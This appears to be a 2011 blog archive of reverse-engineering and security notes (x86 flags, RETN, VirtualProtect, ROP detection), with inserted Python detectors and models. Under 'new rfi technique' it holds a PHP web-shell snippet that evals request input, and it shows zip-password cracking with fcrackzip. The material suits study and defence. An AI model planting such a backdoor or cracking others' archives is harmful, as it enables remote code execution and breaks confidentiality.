
Then install some players and libxine1-ffmpeg and see.


ref:http://ubuntuforums.org/archive/index.php/t-1544929.html

pfctl bsd

BSD is really hard to remember.

pfctl -n -f /etc/pf.conf

cmp, jl, jg

cmp eax, 5
means: eax - 5 (result discarded, flags kept)

mov eax, 4
cmp eax, 5
; > je -> no
; > jl -> yes
; > jg -> no

mov eax, 4
cmp eax, 4
; > je -> yes
; > jl -> no
; > jg -> no

mov eax, 4
cmp eax, 3
; > je -> no
; > jl -> no
; > jg -> yes

Flag Register
Bit 6: Zero -->> if cmp 5,5 -->> Z flag = 1
Bit 7: Sign -->> negative sign, if cmp 1,2 -->> flag = 1

14 April 2011

print a poster on a4 paper

ubuntu$ pdfposter -s 1  asal.pdf baru.pdf

asal.pdf is the large-format file, just one page.
baru.pdf is an a4-size file, but with many pages.

print baru.pdf and join the a4 sheets into one big poster

looking for ROP (return-oriented programming)

1- stop when you hit 'retn'
2- if the top 20 values on the stack point to an executable area in memory, an ROP attempt is very likely.
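Heuristic 2 as detection code, an added Python example that is not from the original post: given a stack snapshot and the executable regions of the process, count how many of the top 20 slots point into executable memory. The executable range is the `.text` entry from the Immunity Debugger memory map shown later on this page (address 00401000, size 0000F000); the two stack snapshots are constructed, and the 50% threshold is my own choice.

```python
from typing import List, Tuple

# Executable region taken from the memory map shown in the VirtualProtect note on
# this page: .text at 00401000, size 0000F000, Access=R E.
EXEC_REGIONS = [(0x00401000, 0x00401000 + 0x0000F000)]


def is_executable(addr: int, regions=EXEC_REGIONS) -> bool:
    """True if addr falls inside a region mapped executable."""
    return any(lo <= addr < hi for lo, hi in regions)


def dwords_from_stack(stack_bytes: bytes) -> List[int]:
    """Split a raw little-endian stack dump into 32-bit values, [ESP] first."""
    usable = len(stack_bytes) - len(stack_bytes) % 4
    return [int.from_bytes(stack_bytes[i:i + 4], "little") for i in range(0, usable, 4)]


def rop_suspicion(stack_values: List[int], top_n: int = 20,
                  threshold: float = 0.5) -> Tuple[int, bool]:
    """Count how many of the top_n stack slots point into executable memory.

    An ordinary frame holds a few return addresses among locals, data pointers
    and arguments; a ROP chain is mostly code pointers, so the ratio jumps.
    Returns (hits, suspicious).
    """
    window = stack_values[:top_n]
    hits = sum(1 for v in window if is_executable(v))
    return hits, bool(window) and hits / len(window) >= threshold


# Constructed stack snapshots (values only; no real process was dumped).
NORMAL_STACK = [0x0012FF7C, 0x00401234, 0x00000005, 0x0012FFA0,
                0x00402000, 0x00000000, 0x7C800000, 0x0012FFC0]
ROP_LIKE_STACK = [
    0x00401012, 0x00402AC0, 0x00000040, 0x00403F10, 0x00401234,
    0x00404560, 0x00001000, 0x00405678, 0x004067AB, 0x00407890,
    0x00408123, 0x0012FF00, 0x00409ABC, 0x0040A000, 0x0040B0B0,
    0x00000000, 0x0040C0C0, 0x0040D0D0, 0x0040E0E0, 0x0040F253,
]

if __name__ == "__main__":
    print("normal   :", rop_suspicion(NORMAL_STACK))
    print("rop-like :", rop_suspicion(ROP_LIKE_STACK))
```

The small non-code values in `ROP_LIKE_STACK` stand for the arguments a chain leaves between gadget addresses; a few of them do not pull the ratio below the threshold, which is why a ratio rather than "all 20" is the workable test.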

new rfi technique

 
<?php
if(isset($_REQUEST["code_str"])){
eval(stripslashes($_REQUEST["code_str"]));
} else {
exit(999 * 4 . " The Roof Is On Fire");
}
?>
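A code-review check for the construct above, as an added Python example that is not from the original post: it scans PHP source for `eval()` (and other code-executing calls) whose argument is fed, possibly through wrappers such as `stripslashes()`, from a request superglobal. The snippet above is the constructed positive sample; the hardened counterpart that picks from a fixed table instead of evaluating input is my own.

```python
import re
from typing import List, Tuple

# Superglobals that carry attacker-controlled input straight into the script.
INPUT_SOURCES = r"\$_(?:REQUEST|GET|POST|COOKIE|SERVER)\b"
# eval( ... $_REQUEST[...] ... ): the argument may be wrapped in helpers such as stripslashes().
EVAL_ON_INPUT = re.compile(r"\beval\s*\([^;]*?" + INPUT_SOURCES, re.I)
# Other calls that execute their argument as code.
DYNAMIC_CALL = re.compile(r"\b(?:assert|create_function)\s*\([^;]*?" + INPUT_SOURCES, re.I)


def scan_php(source: str) -> List[Tuple[int, str, str]]:
    """Return (line number, finding, offending line) for each risky construct."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if EVAL_ON_INPUT.search(line):
            findings.append((lineno, "eval() on request input", line.strip()))
        elif DYNAMIC_CALL.search(line):
            findings.append((lineno, "code-executing call on request input", line.strip()))
    return findings


# The snippet from the post above, used here as the constructed positive sample.
SAMPLE_PHP = '''<?php
if(isset($_REQUEST["code_str"])){
eval(stripslashes($_REQUEST["code_str"]));
} else {
exit(999 * 4 . " The Roof Is On Fire");
}
?>'''

# Hardened counterpart: no eval at all; the parameter only selects from a fixed set.
BENIGN_PHP = '''<?php
$actions = ["status" => "status", "version" => "version"];
$name = $_REQUEST["action"] ?? "status";
if (!isset($actions[$name])) { exit("unknown action"); }
echo $actions[$name];
?>'''

if __name__ == "__main__":
    for finding in scan_php(SAMPLE_PHP):
        print(finding)
    print("benign:", scan_php(BENIGN_PHP))
```

The regexes work line by line, so an `eval` whose argument is assembled in an earlier statement is not caught; that is the usual limit of a grep-style check and the reason to follow up with a look at how the variable was built.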

13 April 2011

pin what???

I think pin (http://www.pintool.org/) can replace hooking.

An example use is to log every opcode instruction that a process executes.

Another alternative is DynamoRIO (http://groups.csail.mit.edu/cag/dynamorio/)


ref: http://blog.zynamics.com/2010/07/28/dumping-shellcode-with-pin/

crack a zip file with fcrackzip

$ zip --encrypt -r secret secret/
(creating secret.zip)

$ fcrackzip -u -c a -p aaaaa secret.zip
PASSWORD FOUND!!!!: pw == linux

ref http://linuxers.org/article/how-crack-zip-file-passwords-linux-using-fcrackzip

12 April 2011

each address holds 8 bits

each address in memory can hold 8 bits.

eg:
address         value (in hexadecimal)
-------------   ----------------------
0x00102000:     41 44
0x00102001:     41 20
0x00102002:     42 41  43 41
0x00102004:     00

  • [1- for dummies: why is 0x00102003 not shown above?]
  • [2- if char *str = 0x102000, what does printf("%s", str) give?]

4 bits can store 16 different values
in hexadecimal    0x0 - 0xF

8 bits (1 byte) >> 0x00 - 0xFF

11 April 2011

cmp (opcode)

cmp eax, ebx
>>
eax - ebx = y
if y == 0, ZF = 1 (True)
if y != 0, ZF = 0 (False)
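One model for the three flag notes on this page (cmp/jl/jg, jump if overflow, and this cmp note), as an added Python example that is not from the original post: compute ZF, SF, CF and OF for a 32-bit `cmp a, b` and derive which conditional jumps would be taken. The three `mov eax, 4` cases above and the `cmp 5,5` / `cmp 1,2` flag examples are the test inputs; the function names are my own.

```python
MASK32 = 0xFFFFFFFF


def to_signed32(v: int) -> int:
    """Reinterpret a 32-bit pattern as a two's-complement signed value."""
    v &= MASK32
    return v - (1 << 32) if v & 0x80000000 else v


def cmp_flags(a: int, b: int) -> dict:
    """Flags produced by 'cmp a, b' (computes a - b, keeps only the flags), 32-bit operands."""
    a &= MASK32
    b &= MASK32
    result = (a - b) & MASK32
    sa, sb, sr = to_signed32(a), to_signed32(b), to_signed32(result)
    return {
        "ZF": int(result == 0),        # bit 6: zero
        "SF": int(result >> 31),       # bit 7: sign, copy of result bit 31
        "CF": int(a < b),              # carry: unsigned borrow
        "OF": int((sa - sb) != sr),    # overflow: the signed result did not fit in 32 bits
    }


def jumps_taken(flags: dict) -> dict:
    """Which conditional jumps fire on the given flags."""
    return {
        "je":  flags["ZF"] == 1,
        "jne": flags["ZF"] == 0,
        "jl":  flags["SF"] != flags["OF"],                        # signed less
        "jg":  flags["ZF"] == 0 and flags["SF"] == flags["OF"],   # signed greater
        "jb":  flags["CF"] == 1,                                  # unsigned below
        "jo":  flags["OF"] == 1,                                  # overflow flag set
    }


def taken_after_cmp(a: int, b: int) -> list:
    """Names of the jumps taken after 'cmp a, b', for quick reading."""
    return sorted(name for name, taken in jumps_taken(cmp_flags(a, b)).items() if taken)


if __name__ == "__main__":
    for a, b in ((4, 5), (4, 4), (4, 3), (0x7FFFFFFF, 0xFFFFFFFF)):
        print(f"cmp {a:#x}, {b:#x}: {cmp_flags(a, b)} -> {taken_after_cmp(a, b)}")
```

The last case is the point of the `jo` note: 0x7FFFFFFF minus -1 (0xFFFFFFFF) is 2^31, which does not fit in a signed 32-bit register, so OF is set even though nothing about the stack is involved.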

Assembly Leave Retn

LEAVE =>  POP EBP

RETN =>  POP EIP
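The stack mechanics behind the call, retn and leave/retn notes on this page, as an added Python example that is not from the original post: a tiny x86-like model with 32-bit registers and a little-endian byte-addressable memory, implementing CALL as push-next-EIP-then-jump, RETN imm16 as pop-EIP-then-ADD-ESP, and LEAVE as MOV ESP,EBP followed by POP EBP. `retn_14_example` replays the RETN 14 walk-through from the 26 April note (ESP = 001BFA18 before, 001BFA30 after); the return address placed on the stack there is constructed, as are the class and function names.

```python
class Cpu32:
    """Minimal x86-like model: 32-bit ESP/EIP/EBP and a sparse little-endian memory."""

    def __init__(self, esp: int, eip: int, ebp: int = 0):
        self.esp, self.eip, self.ebp = esp, eip, ebp
        self.mem = {}                            # address -> byte value

    def write32(self, addr: int, value: int) -> None:
        for i, b in enumerate((value & 0xFFFFFFFF).to_bytes(4, "little")):
            self.mem[addr + i] = b

    def read32(self, addr: int) -> int:
        return int.from_bytes(bytes(self.mem.get(addr + i, 0) for i in range(4)), "little")

    def push(self, value: int) -> None:
        self.esp -= 4
        self.write32(self.esp, value)

    def pop(self) -> int:
        value = self.read32(self.esp)
        self.esp += 4
        return value

    def call(self, target: int, insn_len: int = 5) -> None:
        """CALL rel32: push the address of the next instruction, then jump to target."""
        self.push(self.eip + insn_len)
        self.eip = target

    def retn(self, imm16: int = 0) -> None:
        """RETN [imm16]: pop EIP, then ADD ESP, imm16 so the callee discards its arguments."""
        self.eip = self.pop()
        self.esp += imm16

    def leave(self) -> None:
        """LEAVE: MOV ESP, EBP then POP EBP (tears down the frame set up by push ebp / mov ebp, esp)."""
        self.esp = self.ebp
        self.ebp = self.pop()


def retn_14_example() -> tuple:
    """Replay the RETN 14 walk-through: ESP=001BFA18 before, return address on top of the stack."""
    cpu = Cpu32(esp=0x001BFA18, eip=0x76E0BFA9)
    cpu.write32(0x001BFA18, 0x00401234)          # constructed return address at [ESP]
    cpu.retn(0x14)                               # POP EIP (ESP -> 001BFA1C), ADD ESP, 14h
    return cpu.eip, cpu.esp


def call_then_retn_example() -> tuple:
    """CALL 0x00402000 from 0x00401000, then RETN in the callee: EIP is back at the next instruction."""
    cpu = Cpu32(esp=0x00001000, eip=0x00401000)
    cpu.call(0x00402000)
    pushed = cpu.read32(cpu.esp)                 # what CALL left on the stack
    cpu.retn()
    return pushed, cpu.eip, cpu.esp


if __name__ == "__main__":
    eip, esp = retn_14_example()
    print(f"after RETN 14: EIP={eip:08X} ESP={esp:08X}")
    print(call_then_retn_example())
```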

VirtualProtect

In Immunity Debugger -> Memory Map

Before
Memory map, item 13
 Address=00401000
 Size=0000F000 (61440.)
 Owner=setup279 00400000
 Section=.text
 Contains=code
 Type=Imag 01001002
 Access=R E
 Initial access=RWE



Call the VirtualProtect API
0040F253  |. 50             PUSH EAX                                          ; /pOldProtect
0040F254  |. 6A 40          PUSH 40                                           ; |NewProtect = PAGE_EXECUTE_READWRITE
0040F256  |. 52             PUSH EDX                                          ; |Size
0040F257  |. 68 00104000    PUSH setup279.00401000                            ; |Address = setup279.00401000
0040F25C  |. E8 1F000000    CALL <JMP.&kernel32.VirtualProtect>               ; \VirtualProtect


 Result

Memory map, item 13
 Address=00401000
 Size=0000F000 (61440.)
 Owner=setup279 00400000
 Section=.text
 Contains=code
 Type=Imag 01001002
 Access=RWE CopyOnWr
 Initial access=RWE


The change is in the Access field, from [R E] to [RWE CopyOnWr]
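Turning the observation above into a check, as an added Python example that is not from the original post: parse memory-map entries in the format shown (the two `Memory map, item 13` blocks are the sample input, copied from above) and report regions whose Access field is both writable and executable, plus those that became so between two snapshots. Function names are my own.

```python
from typing import Dict, List

# The two memory-map entries from the note above (before and after VirtualProtect).
MEMMAP_BEFORE = """Memory map, item 13
 Address=00401000
 Size=0000F000 (61440.)
 Owner=setup279 00400000
 Section=.text
 Contains=code
 Type=Imag 01001002
 Access=R E
 Initial access=RWE"""

MEMMAP_AFTER = MEMMAP_BEFORE.replace("Access=R E", "Access=RWE CopyOnWr")


def parse_memmap(text: str) -> Dict[str, str]:
    """Parse one Immunity Debugger memory-map entry into a dict of its fields."""
    fields = {}
    for line in text.splitlines()[1:]:           # skip the 'Memory map, item N' header
        key, _, value = line.strip().partition("=")
        fields[key] = value.strip()
    return fields


def access_letters(access: str) -> set:
    """'R E' -> {'R','E'}, 'RWE CopyOnWr' -> {'R','W','E'}: keep only the protection letters."""
    return set("".join(tok for tok in access.split() if set(tok) <= set("RWE")))


def wx_violations(entries: List[str]) -> List[str]:
    """Addresses of regions that are currently both writable and executable."""
    out = []
    for text in entries:
        fields = parse_memmap(text)
        if {"W", "E"} <= access_letters(fields.get("Access", "")):
            out.append(fields["Address"])
    return out


def regions_turned_wx(before: List[str], after: List[str]) -> List[str]:
    """Addresses that were not W+E in the first snapshot but are in the second."""
    return sorted(set(wx_violations(after)) - set(wx_violations(before)))


if __name__ == "__main__":
    print("before:", wx_violations([MEMMAP_BEFORE]))
    print("after :", wx_violations([MEMMAP_AFTER]))
    print("newly writable+executable:", regions_turned_wx([MEMMAP_BEFORE], [MEMMAP_AFTER]))
```

A `.text` section that is readable and executable is normal; the same section turning RWE after a `VirtualProtect` with `PAGE_EXECUTE_READWRITE` (0x40, as in the listing above) is the kind of change worth flagging, because code that can be written and then run is what an unpacker or shellcode stage needs.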

07 April 2011

Bismillah

Beginning in the name of Allah, the Most Gracious, the Most Merciful.
And blessings and peace upon the Prophet Muhammad (SAW)